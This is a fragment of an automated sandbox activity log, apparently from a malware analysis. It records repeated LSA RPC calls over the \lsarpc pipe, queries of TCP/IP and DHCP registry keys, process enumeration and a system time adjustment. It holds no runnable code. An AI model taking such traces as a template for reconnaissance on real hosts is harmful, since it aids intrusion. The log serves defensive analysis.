\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 52 B2 13 57 E8 75 4E 4E 80 22 E4 39 85 18 5C 47 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9.....R..W.uNN.".9..\G.................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 52 B2 13 57 E8 75 4E 4E 80 22 E4 39 85 18 5C 47 ........,...................R..W.uNN.".9..\G pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 3E F4 C5 9A E2 7B 4F 4A BF 83 AE 46 5A 18 28 DD 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9.....>....{OJ...FZ.(..................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 3E F4 C5 9A E2 7B 4F 4A BF 83 AE 46 5A 18 28 DD ........,...................>....{OJ...FZ.(. pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 B0 75 F0 E4 25 5A B2 45 BB 5C 29 7C 0C 26 2A 06 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9......u..%Z.E.\)|.&*..................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 B0 75 F0 E4 25 5A B2 45 BB 5C 29 7C 0C 26 2A 06 ........,....................u..%Z.E.\)|.&*. pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 FA A9 15 E8 2C 0F AA 4F 96 EA 0F E1 81 7E 5E A2 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9.........,..O.....~^..................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 FA A9 15 E8 2C 0F AA 4F 96 EA 0F E1 81 7E 5E A2 ........,.......................,..O.....~^. pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 74 00 00 00 02 00 00 00 5C 00 00 00 00 00 39 00 00 00 00 00 31 72 9E CE B9 01 51 4A A2 6E F0 4F F7 CA 1D 4A 01 00 00 00 00 00 02 00 01 00 00 00 04 00 02 00 05 00 00 00 01 05 00 00 00 00 00 05 15 00 00 00 FD 43 46 1E 81 77 D9 74 43 17 0A 32 F4 01 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ........t.......\.....9.....1r....QJ.n.O...J.................................CF..w.tC..2............................ pending 1 77E81068
\lsarpc Ctrl code set: 11C017 05 00 00 03 10 00 00 00 2C 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 31 72 9E CE B9 01 51 4A A2 6E F0 4F F7 CA 1D 4A ........,...................1r....QJ.n.O...J pending 1 77E81068
Registry Activities:
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Bind buffer overflow 22 77DD708B
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Bind success or wait 11 77DD708B
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} EnableDHCP success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DD7B68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} DhcpServer success or wait 1 77DDEEC1
System Activities:
+ System information set
System info class Data Completion Count Source Address
TimeAdjustmentInformation 0000000001420F00 success or wait 10 4029AA
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 11 409989
+ Chronological sections
Operation Data Completion Time
System info queried Type: ProcessInformation success or wait 2031069892
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2031130207
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2031204357
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 B3 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 52 00 success or wait 2031211489
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2031213355
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9........px..K..p..X.'.................................CF..w.tC..2............................ pending 2031544448
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,......................px..K..p..X.' pending 2031556006
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2033546096
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2033546889
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2033550767
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2033565311
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2033566318
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2033567798
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2033568843
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2033577540
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2035780425
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2035780978
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2035799094
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2035815609
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2035817438
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2035818235
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2059079663
System info queried Type: ProcessInformation success or wait 2071619742
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2071654752
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2071658590
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 B5 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 52 00 success or wait 2071661607
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2071669741
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9........!.Q.@.\_.Z7.I.................................CF..w.tC..2............................ pending 2071675810
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,......................!.Q.@.\_.Z7.I pending 2071682316
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2071772952
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2071773494
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2071781819
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2071832312
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2071832855
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2071833512
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2071834233
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2071837996
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2072704299
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2072704853
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2072705461
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2072706089
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2072707612
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2072708956
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2094875830
System info queried Type: ProcessInformation success or wait 2108482103
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2108515167
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2108518479
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 BA 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2108521134
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2108522808
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9...........PD.[....NX.................................CF..w.tC..2............................ pending 2108530050
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,.........................PD.[....NX pending 2108550909
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2108678212
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2108678609
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2108679727
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2108685896
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2108686382
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2108686859
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2108687500
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2108688992
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2108729668
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2108730161
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2108730653
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2108731212
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2108732493
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2108733629
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2130670689
System info queried Type: ProcessInformation success or wait 2144529845
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2144589809
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2144607306
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 FB 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2144620480
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2144624811
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9......S.e.#.E.....{...................................CF..w.tC..2............................ pending 2144637522
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,....................S.e.#.E.....{.. pending 2144644023
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2144802010
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2144802450
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2144803673
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2144810424
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2144810957
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2144811477
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2144812051
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2144813350
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2144859139
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2144859681
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2144860222
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2144860831
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2144862238
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2144863502
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2166466003
System info queried Type: ProcessInformation success or wait 2180628597
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2180661991
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2180665971
File read Path: \lsarpc Offset: 0 Length: 1024 Value: 05 00 0C 03 10 00 00 00 44 00 00 00 01 00 00 00 B8 10 B8 10 FC 24 00 00 0C 00 5C 50 49 50 45 5C 6C 73 61 73 73 00 00 00 01 00 00 00 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 48 00 41 00 4E 00 55 00 45 00 4C 00 45 00 2D 00 42 00 43 00 36 00 30 00 37 00 32 00 30 00 00 00 success or wait 2180668868
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........@.......(.....,......................................... pending 2180670601
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........t.......\.....9........[.v.L.)...}r..................................CF..w.tC..2............................ pending 2180676920
File control set Path: \lsarpc Control Code: 11C017 Input Buffer: ........,......................[.v.L.)...}r. pending 2180683325
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2180771143
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2180771589
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2180772931
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2180780000
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind buffer overflow 2180780532
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage Name: Bind success or wait 2180781058
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2180781761
File opened Path: \Device\Tcp6 Access: generic execute Options: no options Attributes: normal Content Overwritten: false object name not found 2180784548
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: EnableDHCP success or wait 2180829667
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2180830210
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{21861216-BE56-4763-BD46-43D214321A9E} Name: DhcpServer success or wait 2180830756
File opened Path: \Device\NetBT_Tcpip_{21861216-BE56-4763-BD46-43D214321A9E} Access: read data or list directory and write data or add file and synchronize Options: no options Attributes: normal Content Overwritten: true success or wait 2180831369
File opened Path: \Device\Afd\Endpoint Access: synchronize and generic read and generic write Options: synchronous io non alert Attributes: none Content Overwritten: true success or wait 2180832782
File opened Path: \Device\Tcp Access: synchronize and generic execute Options: synchronous io non alert Attributes: normal Content Overwritten: true success or wait 2180834041
System info set Type: TimeAdjustmentInformation Data: 0000000001420F00 success or wait 2202261560
System info queried Type: ProcessInformation success or wait 2216681011
File opened Path: \pipe\lsarpc Access: read attributes and synchronize and generic read and generic write Options: non directory file Attributes: none Content Overwritten: false success or wait 2216751754
File write Path: \lsarpc Offset: 0 Length: 72 Value: 05 00 0B 03 10 00 00 00 48 00 00 00 01 00 00 00 B8 10 B8 10 00 00 00 00 01 00 00 00 00 00 01 00 78 57 34 12 34 12 CD AB EF 00 01 23 45 67 89 AB 00 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02 00 00 00 success or wait 2216755362
